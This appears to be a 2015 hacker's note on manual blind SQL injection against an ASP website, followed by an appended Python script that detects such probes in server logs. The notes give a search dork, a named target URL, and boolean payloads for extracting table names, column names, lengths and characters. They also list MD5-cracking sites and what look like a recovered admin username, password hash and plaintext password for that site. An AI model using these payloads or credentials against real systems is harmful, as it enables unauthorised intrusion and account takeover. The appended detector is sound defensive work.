Hacker Injection: Manual Injection
2015-08-24 00:18
First, find the injection point
inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
Guess the table name: and (select count(*) from table_name)>0
Guess the column name: and (select count(column_name) from table_name)>0
Guess the length: and (select top 1 len(username) from admin)>5
username length: 4
password length: 16
Guess the content: and (select top 1 asc(mid(password,1,1)) from admin)>50
ASCII codes
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
Common table names
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
Guess the table name: and (select count(*) from sysadmin)>0
Guess the column name: and (select count(username) from sysadmin)>0
Guess the length: and (select top 1 len(username) from sysadmin)>5
Guess the content: and (select top 1 asc(mid(username,1,1)) from admin)>50
ASCII codes
username 120,117
admin
username 5
password 16
104 115
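Added example (not part of the original notes): a log-review sketch that flags the three probe shapes listed above (count-based table/column guesses, `len()` length guesses, and `asc(mid())` character tests) in web-server request lines. The "<ip> <url>" log format, the sample lines, the IP addresses and the path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One pattern per probe shape from the notes (boolean tests appended to an id parameter).
PROBES = {
    "table_or_column_guess": re.compile(
        r"\band\s*\(\s*select\s+count\s*\(\s*[\w*]+\s*\)\s*from\s+\w+\s*\)\s*[<>=]", re.I),
    "length_guess": re.compile(
        r"\bselect\s+top\s+1\s+len\s*\(\s*\w+\s*\)\s*from\s+\w+", re.I),
    "char_extraction": re.compile(
        r"\bselect\s+top\s+1\s+asc\s*\(\s*mid\s*\(\s*\w+\s*,\s*\d+\s*,\s*\d+\s*\)\s*\)", re.I),
}

def normalize(url):
    """URL-decode ('+' and %20 become spaces) and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(url))

def classify(url):
    """Return the names of all probe shapes found in one request URL."""
    decoded = normalize(url)
    return [name for name, rx in PROBES.items() if rx.search(decoded)]

def scan(lines, threshold=3):
    """Return {client_ip: {probe_name: count}} for clients with >= threshold hits."""
    hits = {}
    for line in lines:
        ip, _, url = line.partition(" ")  # assumed format: "<ip> <path?query>"
        for name in classify(url):
            per_ip = hits.setdefault(ip, {})
            per_ip[name] = per_ip.get(name, 0) + 1
    return {ip: c for ip, c in hits.items() if sum(c.values()) >= threshold}

# Constructed sample log lines (documentation-range IPs, hypothetical path).
SAMPLE = [
    "192.0.2.10 /item.asp?id=9",
    "198.51.100.7 /item.asp?id=9%20and%20(select%20count(*)%20from%20admin)>0",
    "198.51.100.7 /item.asp?id=9+and+(select+count(username)+from+admin)>0",
    "198.51.100.7 /item.asp?id=9+and+(select+top+1+len(username)+from+admin)>5",
    "198.51.100.7 /item.asp?id=9+and+(select+top+1+asc(mid(password,1,1))+from+admin)>50",
    "192.0.2.10 /search.asp?q=select+a+top+and+count+on+it",
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE).items():
        print(ip, counts)
```

A match indicates probing, not compromise; the underlying fix is to bind `id` as a typed parameter instead of concatenating it into the query string.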